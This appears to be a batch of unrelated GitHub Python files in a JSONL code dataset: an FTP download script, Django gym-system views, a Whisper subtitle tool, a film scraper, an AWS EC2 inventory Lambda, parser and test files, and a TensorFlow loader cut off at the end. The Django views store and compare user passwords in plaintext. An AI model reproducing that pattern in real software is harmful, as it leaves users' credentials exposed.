+{"seq_id":"27473320289","text":"#title :qdFTP.py\r\n#description :Quick and dirty FTP script.\r\n#author :Harsimran Grewal (Retr0-Flow on github)\r\n#date :08/11/2018\r\n#version :3.0\r\n#usage :python qdFTP.py\r\n#notes : This is meant to be used as a quick way to connect a TRUSTED FTP site over a TRUSTED network. I am not responsible for any data leakage.\r\n# This program is meant to be used through the command line only, any use in functional programs may result in unexpected behaviour/errors\r\n#python_version :3.7.0\r\n#==============================================================================\r\n\r\n\r\nimport os #library containing operating system calls\r\nfrom ftplib import FTP #library for ftp calls\r\n\r\ndef ftpDownload():\r\n # FTP login\r\n ftp = FTP('ADDRESS')\r\n ftp.login('LOGIN', 'PASSWORD') #ftp login call\r\n \r\n # mode A will be directory traversal, mode B will be file download\r\n userDone = False\r\n userInput = input('Enter \"A\" for directory traversal or \"B\" for file downloading or \"exit\" to exit: ',)\r\n\r\n if userInput == 'exit':\r\n userDone = True\r\n print('--Connection closed--')\r\n \r\n while userDone != True:\r\n mode = userInput\r\n \r\n while mode == 'A' or mode == 'a':\r\n print('**Enter \"B\" for file download mode or \"exit\" to exit**')\r\n currentDir = ftp.pwd()\r\n print('Current directory: \"' + currentDir + '\"')\r\n dirList = []\r\n \r\n ftp.dir(dirList.append )\r\n listObj = ftp.nlst()\r\n count = 0\r\n for item in dirList:\r\n count += 1\r\n print(str(count) + \": \" + item)\r\n print('HINT: Enter \"back\" to go back a directory')\r\n userInput = input('Select directory to enter: ',)\r\n \r\n if userInput == 'B' or userInput == 'b':\r\n mode = 'B'\r\n continue\r\n elif userInput == 'A' or userInput == 'a':\r\n print(\"ERROR: You're already in this mode!\")\r\n continue\r\n \r\n if userInput == 'exit':\r\n userDone = True\r\n print('--Connection closed--') \r\n break \r\n \r\n if userInput == 'back':\r\n ftp.cwd('..')\r\n continue\r\n \r\n ftp.cwd(listObj[int(userInput) - 1]) \r\n \r\n while mode == 'B' or mode == 'b':\r\n print('**Enter \"A\" for directory traversal mode or \"exit\" to exit**')\r\n currentDir = ftp.pwd()\r\n print('Current directory: \"' + currentDir + '\"')\r\n dirList = []\r\n ftp.dir(dirList.append)\r\n listObj = ftp.nlst()\r\n count = 0\r\n \r\n for item in dirList:\r\n count += 1\r\n print(str(count) + \": \" + item)\r\n print('HINT: Enter \"all\" to download all files')\r\n userInput = input('Select file to download: ',)\r\n \r\n \r\n if userInput == 'A' or userInput == 'a':\r\n mode = 'A'\r\n continue\r\n \r\n elif userInput == 'B' or userInput == 'b':\r\n print(\"ERROR: You're already in this mode!\") \r\n continue\r\n \r\n if userInput == 'exit':\r\n userDone = True\r\n print('--Connection closed--') \r\n break\r\n \r\n if userInput == 'all':\r\n for file in listObj:\r\n sourceFileName = file\r\n newFile = file\r\n downloadedFile = os.path.join(r\"C:\\\\Users\\\\hgrewal\\\\Desktop\\\\TestDownloads\", newFile) #assign path and filename for above file to be downloaded into\r\n inputFile = open(downloadedFile, \"wb\") #set variable for file to retrieve and access type\r\n ftp.retrbinary(\"RETR \" + sourceFileName, inputFile.write) #call download function from FTP library\r\n inputFile.close() #close your open file\r\n print(downloadedFile + ' has been sucessfully received')\r\n continue\r\n \r\n sourceFileName = listObj[int(userInput) - 1]\r\n newFile = listObj[int(userInput) - 1]\r\n downloadedFile = os.path.join(r\"C:\\\\Users\\\\hgrewal\\\\Desktop\\\\TestDownloads\", newFile) #assign path and filename for above file to be downloaded into\r\n inputFile = open(downloadedFile, \"wb\") #set variable for file to retrieve and access type\r\n ftp.retrbinary(\"RETR \" + sourceFileName, inputFile.write) #call download function from FTP library\r\n inputFile.close() #close your open file\r\n print(downloadedFile + ' has been sucessfully received')\r\n\r\n","repo_name":"Retr0-Flow/Public-Scripts","sub_path":"qdFTP/qdFTP.py","file_name":"qdFTP.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16878542949","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom .models import Academia_Users\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom aluno.models import Aluno\n\ndef home(request):\n return render(request,'academia/home.html')\n\ndef login(request):\n\n if(request.method == 'POST'):\n data = request.POST.copy()\n\n username = data.get('username')\n if(data.get('tipo') == \"Aluno\"):\n user_found = Aluno.objects.filter(usuario=username).first()\n tipo = \"aluno\"\n else:\n user_found = Academia_Users.objects.filter(username=username).first()\n if(user_found):\n tipo = user_found.tipo.lower()\n if(user_found != None):\n if(user_found.password == data.get('password')):\n messages.success(request,f'Bem-vindo {username}! Você foi logado com sucesso!')\n request.session['user_logged_id'] = user_found.id\n return redirect(f'academia-{tipo}')\n else:\n messages.error(request,f'Nome ou usuario inválidos')\n return render(request,'academia/login.html')\n else:\n messages.error(request,f'Nome ou usuario inválidos')\n return render(request,'academia/login.html')\n\n return render(request,'academia/login.html')\n\ndef register(request):\n\n if(request.method == 'POST'):\n data = request.POST.copy()\n \n new_user = Academia_Users(username=data.get('usuario'),password=data.get('senha'),email=data.get('email'),tipo=data.get('tipo'))\n new_user.save()\n messages.success(request,f'Bem-vindo {data.get(\"usuario\")}! Você foi registrado com sucesso!')\n return redirect('academia-home')\n\n return render(request,'academia/register.html')\n\n\ndef secretario(request):\n return render(request,'academia/secretario.html',{'username':\"Teste\"})","repo_name":"SinvalVJunior/sistema-academia","sub_path":"Sistema_Academia/academia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12233079556","text":"import glob\r\nimport os\r\nimport whisper\r\nimport whisper.utils\r\n\r\n\r\ndef format_timestamp(seconds: float, always_include_hours: bool = False, fractionalSeperator: str = '.'):\r\n assert seconds >= 0, \"non-negative timestamp expected\"\r\n milliseconds = round(seconds * 1000.0)\r\n\r\n hours = milliseconds // 3_600_000\r\n milliseconds -= hours * 3_600_000\r\n\r\n minutes = milliseconds // 60_000\r\n milliseconds -= minutes * 60_000\r\n\r\n seconds = milliseconds // 1_000\r\n milliseconds -= seconds * 1_000\r\n\r\n hours_marker = f\"{hours:02d}:\" if always_include_hours or hours > 0 else \"\"\r\n return f\"{hours_marker}{minutes:02d}:{seconds:02d}{fractionalSeperator}{milliseconds:03d}\"\r\n\r\n\r\nmodel = whisper.load_model(\"large\")\r\nprint(\"model loaded\")\r\ndir_name = '/content/'\r\n# Get list of all files in a given directory sorted by name\r\nlist_of_files = sorted(filter(os.path.isfile,\r\n glob.glob(dir_name + 'out*.mp3')))\r\n# Iterate over sorted list of files and print the file paths\r\n# one by one.\r\ncount = 0\r\n\r\nfor file_path in list_of_files:\r\n fileNumber = int(file_path[12:15])\r\n startingTimeMins = fileNumber * 2\r\n print(file_path + \" \" + str(fileNumber * 2))\r\n\r\n if startingTimeMins >= 0:\r\n text = model.transcribe(file_path, task='translate')\r\n print(str(type(text)))\r\n with open(\"/content/MVSD-390.srt\", \"a\", encoding=\"utf-8\") as srt_file:\r\n\r\n for i, segment in enumerate(text['segments'], start=1):\r\n print(segment)\r\n count = count + 1\r\n # write srt lines\r\n print(\r\n f\"{count}\\n\"\r\n f\"{format_timestamp(segment['start'] + (startingTimeMins * 60), always_include_hours=True, fractionalSeperator=',')} --> \"\r\n f\"{format_timestamp(segment['end'] + (startingTimeMins * 60), always_include_hours=True, fractionalSeperator=',')}\\n\"\r\n f\"{segment['text']}\\n\",\r\n file=srt_file,\r\n flush=True,\r\n )\r\n print(text)","repo_name":"domxch/whisperSubtitles","sub_path":"whisperSubtitles.py","file_name":"whisperSubtitles.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1058459272","text":"from django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom .models import IiefQuestionnaire\n\nclass IiefQuestionnaireTests(APITestCase):\n def test_create_iief_questionnaire(self):\n\n url = reverse('iiefquestionnaire-list')\n data = {\"data\": \n {\"type\": \"IiefQuestionnaire\", \n \"attributes\": {\"confidence\": 4, \"penetration\": 2, \"intercourse\": 4,\"completion\": 3, \"satisfaction\": 2}\n }\n }\n response = self.client.post(url, data)\n\n # Ensure we can create a new iief_questionnaire object.\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n # Ensure the iief_questionnaire object is well created.\n self.assertEqual(IiefQuestionnaire.objects.count(), 1)\n\n # Ensure the score is correct.\n self.assertEqual(IiefQuestionnaire.objects.get().score, 15)\n","repo_name":"MhamedBendenia/IIEF-Analysis-Web-App","sub_path":"web_app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2002321001","text":"import numpy as np\n\nfrom dotenv import load_dotenv\n\nfrom tqdm import tqdm\nimport csv\nimport os\nimport pickle\nimport time\n\nfrom soup import get_soup\nfrom get_film_urls import get_links_in_four_cycle\n\nload_dotenv()\n\n\ndef get_film_descr(url: str) -> list[str, float]:\n \"\"\"return description, genre and rating of film\"\"\"\n soup = get_soup(url)\n\n rating = soup.find('span', class_='styles_value__N2Vzt').text\n rating = np.NAN if (rating == '–') else float(rating)\n\n descr = soup.find('div', class_='styles_synopsisSection__nJoAj').find('p').text\n\n genres = soup.find('div', attrs={'data-tid': '28726596'}).find('div').find_all('a')\n genres = [genre.text for genre in genres]\n genre_str = ','.join(genres)\n\n return [descr, genre_str, rating]\n\n\nif __name__ == '__main__':\n\n # collect links of films\n film_links = []\n if os.path.exists('../data/links.pkl'):\n with open('../data/links.pkl', 'rb') as file_:\n film_links = pickle.load(file_)\n print('len:', len(film_links))\n else:\n film_links = get_links_in_four_cycle()\n print('len', len(film_links))\n with open('../data/links.pkl', 'wb') as file_:\n pickle.dump(film_links, file_)\n\n # create list of checked films\n with open('checked_films.txt', 'r') as file:\n content = file.read()\n checked_films = content.split('\\n') if content else []\n\n # get description of films\n films = []\n print('Start to get data')\n for film_url in tqdm(film_links):\n if film_url in checked_films:\n continue\n else:\n try:\n film = get_film_descr(film_url)\n films.append(film)\n print(len(films))\n checked_films.append(film_url)\n time.sleep(2)\n except:\n time.sleep(2)\n\n with open('checked_films.txt', 'w') as file_:\n print(f'amount of checked links: {len(checked_films)}')\n file_.write('\\n'.join(checked_films))\n\n headers = ['description', 'genre', 'rating']\n with open('../data/film_ratings_1.csv', 'a', encoding='utf-8-sig', newline='') as file_:\n writer = csv.writer(file_, delimiter=';')\n writer.writerow(headers)\n writer.writerows(films)\n print('File is created')\n","repo_name":"andreyshishkov/film_rating_regressor","sub_path":"flm_parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28520341002","text":"import boto3\nfrom botocore.exceptions import ClientError\nimport json\nimport os\nimport time\nfrom datetime import datetime, timezone\nfrom dateutil import tz\n\nfrom antiope.aws_account import *\nfrom common import *\n\nimport logging\nlogger = logging.getLogger()\nlogger.setLevel(getattr(logging, os.getenv('LOG_LEVEL', default='INFO')))\nlogging.getLogger('botocore').setLevel(logging.WARNING)\nlogging.getLogger('boto3').setLevel(logging.WARNING)\nlogging.getLogger('urllib3').setLevel(logging.WARNING)\n\nINSTANCE_RESOURCE_PATH = \"ec2/instance\"\nSG_RESOURCE_PATH = \"ec2/securitygroup\"\n\n\ndef lambda_handler(event, context):\n logger.debug(\"Received event: \" + json.dumps(event, sort_keys=True))\n message = json.loads(event['Records'][0]['Sns']['Message'])\n logger.info(\"Received message: \" + json.dumps(message, sort_keys=True))\n\n try:\n target_account = AWSAccount(message['account_id'])\n regions = target_account.get_regions()\n if 'region' in message:\n regions = [message['region']]\n\n # describe ec2 instances\n for r in regions:\n try:\n ec2_client = target_account.get_client('ec2', region=r)\n process_instances(target_account, ec2_client, r)\n # describe ec2 security groups\n process_securitygroups(target_account, ec2_client, r)\n except ClientError as e:\n # Move onto next region if we get access denied. This is probably SCPs\n if e.response['Error']['Code'] == 'AccessDeniedException':\n logger.error(f\"AccessDeniedException for region {r} in function {context.function_name} for {target_account.account_name}({target_account.account_id})\")\n continue\n else:\n raise # pass on to the next handlier\n\n except AntiopeAssumeRoleError as e:\n logger.error(\"Unable to assume role into account {}({})\".format(target_account.account_name, target_account.account_id))\n return()\n except ClientError as e:\n logger.critical(\"AWS Error getting info for {}: {}\".format(message['account_id'], e))\n capture_error(message, context, e, \"ClientError for {}: {}\".format(message['account_id'], e))\n raise\n except Exception as e:\n logger.critical(\"{}\\nMessage: {}\\nContext: {}\".format(e, message, vars(context)))\n capture_error(message, context, e, \"General Exception for {}: {}\".format(message['account_id'], e))\n raise\n\n\ndef process_instances(target_account, ec2_client, region):\n\n instance_profiles = get_instance_profiles(ec2_client)\n instance_reservations = get_all_instances(ec2_client)\n logger.info(\"Found {} instance reservations for {} in {}\".format(len(instance_reservations), target_account.account_id, region))\n\n # dump info about instances to S3 as json\n for reservation in instance_reservations:\n for instance in reservation['Instances']:\n\n resource_item = {}\n resource_item['awsAccountId'] = target_account.account_id\n resource_item['awsAccountName'] = target_account.account_name\n resource_item['resourceType'] = \"AWS::EC2::Instance\"\n resource_item['source'] = \"Antiope\"\n resource_item['configurationItemCaptureTime'] = str(datetime.datetime.now())\n resource_item['awsRegion'] = region\n resource_item['configuration'] = instance\n if 'Tags' in instance:\n resource_item['tags'] = parse_tags(instance['Tags'])\n resource_item['supplementaryConfiguration'] = {}\n resource_item['resourceId'] = instance['InstanceId']\n resource_item['resourceCreationTime'] = instance['LaunchTime']\n resource_item['errors'] = {}\n\n if instance['InstanceId'] in instance_profiles:\n resource_item['supplementaryConfiguration']['IamInstanceProfileAssociation'] = instance_profiles[instance['InstanceId']]\n\n save_resource_to_s3(INSTANCE_RESOURCE_PATH, resource_item['resourceId'], resource_item)\n\n\ndef process_securitygroups(target_account, ec2_client, region):\n\n sec_groups = get_all_securitygroups(ec2_client)\n logger.info(\"Found {} security groups for {} in {}\".format(len(sec_groups), target_account.account_id, region))\n\n # dump info about instances to S3 as json\n for sec_group in sec_groups:\n\n resource_item = {}\n resource_item['awsAccountId'] = target_account.account_id\n resource_item['awsAccountName'] = target_account.account_name\n resource_item['resourceType'] = \"AWS::EC2::SecurityGroup\"\n resource_item['source'] = \"Antiope\"\n resource_item['configurationItemCaptureTime'] = str(datetime.datetime.now())\n resource_item['awsRegion'] = region\n resource_item['configuration'] = sec_group\n if 'Tags' in sec_group:\n resource_item['tags'] = parse_tags(sec_group['Tags'])\n resource_item['supplementaryConfiguration'] = {}\n resource_item['resourceId'] = sec_group['GroupId']\n resource_item['errors'] = {}\n save_resource_to_s3(SG_RESOURCE_PATH, resource_item['resourceId'], resource_item)\n\n\ndef get_instance_profiles(ec2_client):\n assoc = []\n response = ec2_client.describe_iam_instance_profile_associations()\n while 'NextToken' in response:\n assoc += response['IamInstanceProfileAssociations']\n response = ec2_client.describe_iam_instance_profile_associations(NextToken=response['NextToken'])\n assoc += response['IamInstanceProfileAssociations']\n\n output = {}\n for a in assoc:\n output[a['InstanceId']] = a\n return(output)\n\n\ndef get_all_instances(ec2_client):\n output = []\n response = ec2_client.describe_instances()\n while 'NextToken' in response:\n output += response['Reservations']\n response = ec2_client.describe_instances(NextToken=response['NextToken'])\n output += response['Reservations']\n return(output)\n\n\ndef get_all_securitygroups(ec2_client):\n output = []\n response = ec2_client.describe_security_groups()\n while 'NextToken' in response:\n output += response['SecurityGroups']\n response = ec2_client.describe_security_groups(NextToken=response['NextToken'])\n output += response['SecurityGroups']\n return(output)\n","repo_name":"turnerlabs/antiope","sub_path":"aws-inventory/lambda/inventory-instances-sg.py","file_name":"inventory-instances-sg.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"31"} +{"seq_id":"29021154360","text":"#!/usr/bin/python3 -S\n# -*- coding: utf-8 -*-\nfrom cargo.fields import Enum\n\nfrom unit_tests.fields.Field import *\nfrom unit_tests import configure\n\n\nclass TestEnum(configure.SequenceTestCase, TestField):\n\n @property\n def base(self):\n return self.orm.enum\n\n def test_init(self):\n with self.assertRaises(TypeError):\n Enum()\n\n def test_validate(self):\n enum = [1, 2, 3, 4, 'five', 'six', 'seven']\n base = Enum(*enum)\n base.value = 5\n self.assertFalse(base.validate())\n base(None)\n self.assertTrue(base.validate())\n base('five')\n self.assertTrue(base.validate())\n\n def test___call__(self):\n enum = [1, 2, 3, 4, 'five', 'six', 'seven']\n base = Enum(*enum)\n self.assertTupleEqual(base.types, tuple(enum))\n for val in enum:\n self.assertEqual(base(val), val)\n for val in ['taco', {'b': 'c'}, [2], 1234, 6.0]:\n with self.assertRaises(ValueError):\n base(val)\n\n def test_insert(self):\n self.base('red')\n val = getattr(self.orm.naked().insert(self.base), self.base.field_name)\n self.assertEqual(val, 'red')\n\n self.base(None)\n val = getattr(self.orm.naked().insert(self.base), self.base.field_name)\n self.assertEqual(val, None)\n\n def test_select(self):\n self.assertIs(self.base.value, self.base.empty)\n self.base('blue')\n self.orm.insert(self.base)\n orm = self.orm.new()\n val = getattr(orm.naked().order_by(self.orm.uid.desc()).get(),\n self.base.field_name)\n self.assertEqual(val, self.base.value)\n\n def test_array_insert(self):\n arr = ['red', 'white']\n self.base_array(arr)\n val = getattr(self.orm.naked().insert(self.base_array),\n self.base_array.field_name)\n self.assertListEqual(val, arr)\n\n def test_array_select(self):\n arr = ['red', 'white']\n self.base_array(arr)\n val = getattr(self.orm.naked().insert(self.base_array),\n self.base_array.field_name)\n val_b = getattr(self.orm.naked().desc(self.orm.uid).get(),\n self.base_array.field_name)\n self.assertListEqual(val, val_b)\n\n def test_type_name(self):\n self.assertEqual(self.base.type_name, 'sequence_model_enum_enumtype')\n self.assertEqual(self.base_array.type_name,\n 'sequence_model_array_enum_enumtype[]')\n\n\nif __name__ == '__main__':\n # Unit test\n configure.run_tests(TestEnum, failfast=True, verbosity=2)\n","repo_name":"jaredLunde/cargo-orm","sub_path":"unit_tests/fields/Enum.py","file_name":"Enum.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"71417018649","text":"\"\"\"The abstract syntax tree elements and parser.\"\"\"\n\nimport collections\nimport contextlib\nimport functools\n\nfrom weirdc import CompileError, Location, utils\n\n\ndef _node(name, fields):\n return utils.miniclass(__name__, name, ['location'] + fields)\n\n# expressions that can also be statements\n# only FunctionCall makes sense as a statement, so other statements\n# are removed in checker.py\nName = _node('Name', ['name'])\nInteger = _node('Integer', ['value'])\nString = _node('String', ['value'])\nFunctionCall = _node('FunctionCall', ['function', 'args'])\n\n# these aren't valid expressions\nDeclaration = _node('Declaration', ['type', 'name'])\nAssignment = _node('Assignment', ['target', 'value'])\nIf = _node('If', ['condition', 'body'])\nReturn = _node('Return', ['value'])\nFunctionDef = _node('FunctionDef', ['name', 'args', 'returntype', 'body'])\n\n# these doesn't have locations, so we can't use _node()\n# TODO: add these everywhere in decreffer.py\nIncRef = utils.miniclass(__name__, 'IncRef', ['varname'])\nDecRef = utils.miniclass(__name__, 'DecRef', ['varname'])\n\n\n# this kind of abuses EOFError... feels good, i'm evil >:D MUHAHAHAA!!!\nclass _HandyDandyTokenIterator:\n\n def __init__(self, iterable):\n self._iterator = iter(iterable)\n self._coming_up_stack = collections.deque()\n\n # this is only used in _Parser.parse_file()\n self.last_popped = None\n\n def pop(self):\n try:\n result = self._coming_up_stack.pop()\n except IndexError:\n try:\n result = next(self._iterator)\n except StopIteration:\n raise EOFError\n\n self.last_popped = result\n return result\n\n def coming_up(self, n=1):\n while len(self._coming_up_stack) < n:\n try:\n # pop() doesn't work if there's something on _coming_up_stack\n self._coming_up_stack.appendleft(next(self._iterator))\n except StopIteration as e:\n raise EOFError from e\n return self._coming_up_stack[-n]\n\n # this must be \"check and pop\", not \"pop and check\"\n # that way this can be used in try/except\n def check_and_pop(self, kind, value=None):\n if value is not None and self.coming_up().value != value:\n raise CompileError(\"this should be '%s'\" % value,\n self.coming_up().location)\n\n if self.coming_up().kind != kind:\n raise CompileError(\n \"this should be %s\" % utils.add_article(kind.lower()),\n self.coming_up().location)\n\n return self.pop()\n\n # this skips everything except the first NEWLINE when there are\n # multiple NEWLINE tokens with nothing in between\n def pop_newline(self):\n try:\n self.check_and_pop('NEWLINE')\n while self.coming_up().kind == 'NEWLINE':\n self.pop()\n except EOFError:\n # no trailing newline at the end of file\n pass\n\n\n_KEYWORDS = {'return', 'if'}\n\n\nclass _Parser:\n\n def __init__(self, tokens):\n self.tokens = _HandyDandyTokenIterator(tokens)\n\n def parse_name(self, check_for_keywords=True):\n # thing\n token = self.tokens.check_and_pop('NAME')\n if check_for_keywords and token.value in _KEYWORDS:\n raise CompileError(\n \"%s is not a valid variable name because it has a \"\n \"special meaning\" % token.value,\n token.location)\n return Name(token.location, token.value)\n\n def parse_integer(self):\n # 3735928559\n token = self.tokens.check_and_pop('INTEGER')\n return Integer(token.location, token.value)\n\n def parse_string(self):\n # \"hello world\"\n # TODO: \"hello \\\"world\\\" ${some code}\"\n token = self.tokens.check_and_pop('STRING')\n return String(token.location, token.value[1:-1])\n\n def parse_parentheses(self):\n # ( expr )\n # parentheses don't have a node type because they just change\n # the evaluation order\n self.tokens.check_and_pop('OP', '(')\n content = self.parse_expression()\n self.tokens.check_and_pop('OP', ')')\n return content\n\n # return (element_list, stop_token)\n def _parse_comma_list(self, start='(', stop=')', parsemethod=None):\n # ( )\n # ( element )\n # ( element , )\n # ( element , element )\n # ( element , element , )\n # ...\n if parsemethod is None:\n parsemethod = self.parse_expression\n\n start_token = self.tokens.check_and_pop('OP', start)\n if self.tokens.coming_up().startswith(['OP', stop]):\n # empty list\n return ([], self.tokens.pop())\n\n elements = []\n while True:\n if self.tokens.coming_up().startswith(['OP', ',']):\n raise CompileError(\"don't put a ',' here\",\n self.tokens.coming_up().location)\n elements.append(parsemethod())\n\n if self.tokens.coming_up().startswith(['OP', stop]):\n return (elements, self.tokens.pop())\n\n comma = self.tokens.check_and_pop('OP', ',')\n if self.tokens.coming_up().startswith(['OP', ',']):\n raise CompileError(\n \"two ',' characters\",\n Location.between(comma, self.tokens.coming_up()))\n\n if self.tokens.coming_up().startswith(['OP', stop]):\n return (elements, self.tokens.pop())\n\n def parse_expression(self):\n coming_up = self.tokens.coming_up()\n if coming_up.kind == 'NAME':\n # hello\n result = self.parse_name()\n elif coming_up.kind == 'STRING':\n # \"hello\"\n result = self.parse_string()\n elif coming_up.kind == 'INTEGER':\n # 123\n result = self.parse_integer()\n elif coming_up.startswith(['OP', '(']):\n result = self.parse_parentheses()\n else:\n raise CompileError(\n \"this should be variable name, string, integer or '('\",\n coming_up.location)\n\n # check for function calls, this is a while loop to allow\n # function calls like thing()()()\n while self.tokens.coming_up().startswith(['OP', '(']):\n args, stop_token = self._parse_comma_list('(', ')')\n result = FunctionCall(Location.between(result, stop_token),\n result, args)\n\n return result\n\n # rest of these methods are for parsing statements\n\n def parse_expression_statement(self):\n # expression and newline\n value = self.parse_expression()\n self.tokens.pop_newline()\n return value\n\n def assignment(self):\n # thing = value\n # TODO: thing's stuff = value\n target = self.parse_name()\n self.tokens.check_and_pop('OP', '=')\n value = self.parse_expression()\n self.tokens.pop_newline()\n return Assignment(Location.between(target, value), target, value)\n\n def parse_if(self):\n # if cond { statements }\n the_if = self.tokens.check_and_pop('NAME', 'if')\n condition = self.parse_expression()\n\n self.tokens.check_and_pop('OP', '{')\n body = []\n\n # allow \"if thing { }\" without a newline\n if not self.tokens.coming_up().startswith(['OP', '}']):\n self.tokens.pop_newline()\n while not self.tokens.coming_up().startswith(['OP', '}']):\n body.extend(self.parse_statement())\n closing_brace = self.tokens.check_and_pop('OP', '}')\n\n self.tokens.pop_newline()\n return If(Location.between(the_if, closing_brace), condition, body)\n\n def _type_and_name(self):\n # Int a\n # this returns (typenode, name_string)\n typenode = self.parse_name() # TODO: module's Thing\n name = self.parse_name()\n return (typenode, name)\n\n def parse_declaration(self) -> list:\n # Int thing\n # Int thing = expr\n # TODO: module.Thingy thing\n #\n # \"Int thing = expr\" produces overlapping Declaration and\n # Assignment nodes, that's why this returns a list of nodes\n datatype = self.parse_name() # TODO: module's Thing\n variable = self.parse_name()\n\n if self.tokens.coming_up().kind == 'NEWLINE':\n self.tokens.pop_newline()\n return [Declaration(Location.between(datatype, variable),\n datatype, variable.name)]\n\n self.tokens.check_and_pop('OP', '=')\n initial_value = self.parse_expression()\n self.tokens.pop_newline()\n return [Declaration(Location.between(datatype, variable),\n datatype, variable.name),\n Assignment(Location.between(variable, initial_value),\n variable, initial_value)]\n\n def parse_return(self):\n the_return = self.tokens.check_and_pop('NAME', 'return')\n value = self.parse_expression()\n self.tokens.pop_newline()\n return Return(Location.between(the_return, value), value)\n\n def parse_statement(self) -> list:\n # coming_up(1) and coming_up(2) work because there's always a\n # newline and at least something before it\n if self.tokens.coming_up(1).kind == 'NAME':\n if self.tokens.coming_up(1).value == 'return':\n return [self.parse_return()]\n if self.tokens.coming_up(1).value == 'if':\n return [self.parse_if()]\n if self.tokens.coming_up(1).value == 'function':\n return [self.parse_function_def()]\n\n try:\n after_name = self.tokens.coming_up(2)\n except EOFError:\n return [self.parse_expression_statement()]\n\n if after_name.startswith(['OP', '=']):\n return [self.assignment()]\n if after_name.kind == 'NAME':\n return self.parse_declaration()\n\n return [self.parse_expression_statement()]\n\n def parse_function_def(self):\n # function main() { ... }\n # function thing() returns Int { ... }\n function_keyword = self.tokens.check_and_pop('NAME', 'function')\n name = self.parse_name()\n args, junk = self._parse_comma_list(\n '(', ')', parsemethod=self._type_and_name)\n\n if self.tokens.coming_up().startswith(['NAME', 'returns']):\n self.tokens.pop()\n returntype = self.parse_name()\n else:\n returntype = None\n\n opening_brace = self.tokens.check_and_pop('OP', '{')\n if self.tokens.coming_up().kind == 'NEWLINE':\n self.tokens.pop_newline()\n body = []\n while not self.tokens.coming_up().startswith(['OP', '}']):\n body.extend(self.parse_statement())\n closing_brace = self.tokens.check_and_pop('OP', '}')\n self.tokens.pop_newline()\n\n return FunctionDef(Location.between(function_keyword, closing_brace),\n name.name, args, returntype, body)\n\n def parse_file(self):\n while True:\n try:\n self.tokens.coming_up(1)\n except EOFError:\n break\n\n try:\n yield from self.parse_statement()\n except EOFError:\n # underline 3 blanks after last token\n last_location = self.tokens.last_popped.location\n mark_here = Location(last_location.end, last_location.end+3,\n last_location.lineno)\n\n # python abbreviates this as EOF and beginners don't\n # understand it, but i guess this one is good enough\n raise CompileError(\"unexpected end of file\", mark_here)\n\n\ndef parse(tokens):\n \"\"\"Convert an iterable of tokens to AST nodes.\n\n This returns an iterator.\n \"\"\"\n parser = _Parser(tokens)\n return parser.parse_file()\n","repo_name":"Akuli/weird-language","sub_path":"weirdc/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":11975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34107242264","text":"import unittest\nimport merge_sorted_arrays\n\n\nclass TestProgram(unittest.TestCase):\n def test_case_1(self):\n arrays = [\n [1, 5, 9, 21],\n [-1, 0],\n [-124, 81, 121],\n [3, 6, 12, 20, 150],\n ]\n output = merge_sorted_arrays.mergeSortedArrays(arrays)\n self.assertEqual(output, [-124, -1, 0, 1, 3, 5, 6, 9, 12, 20, 21, 81, 121, 150])\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"acemodou/Working-Copy","sub_path":"DataStructures/v1/Heaps/problems/test_merge_sorted_array.py","file_name":"test_merge_sorted_array.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13809002691","text":"import os\nimport pathlib\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nfrom IPython.display import display\nfrom object_detection.utils import ops as utils_ops\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\nfrom .models import *\nimport re\n\nMIN_DETECTION_SCORE = 0.6\n\n#this class Model loads the trained model and the neccassary id and names from database\n# into main memory at program initialization \nclass Model:\n detection_model = tf.saved_model.load(\"C:\\\\Users\\\\Hussa\\\\Desktop\\\\TF2\\\\Experiment\\\\inference\\\\ExportedSavedModel\\\\saved_model\")\n\n getId = {}\n #map each original name from database to ID\n for id_and_name in Faculty.objects.values('id', 'name'):\n getId[id_and_name['name']] = id_and_name['id'] \n\n #map names coming from model to their ids using the map \"getId\"\n faculties_ids={\n 'none' : 0,\n \"kasit\": getId['King Abdulla II School For Information Technology'],\n \"medicine\": getId['School of Medicine'],\n \"engineering\": getId['School of Engineering'],\n \"shareeah\": getId['School of Sharia'],\n \"business\": getId['School of Business'],\n \"law\": getId['School of Law'],\n \"kitchen\": getId['Community Restaurant'],\n \"educational\" : getId['School of Educational Sciences'],\n 'nursing': getId['School of Nursing'],\n 'pharamcy': getId['School of Pharmacy'],\n 'dentistry' : getId['School of Dentistry'],\n 'rehabilitation' : getId['School of Rehabilitation Sciences'],\n 'arts - design' : getId['School of Arts and Design'],\n 'languages' : getId['School of Foreign Languages'],\n 'arts' : getId['School of Arts'],\n 'science' : getId['School of Science'],\n }\n\n print(faculties_ids)\n\n# patch tf1 into `utils.ops`\nutils_ops.tf = tf.compat.v1\n# 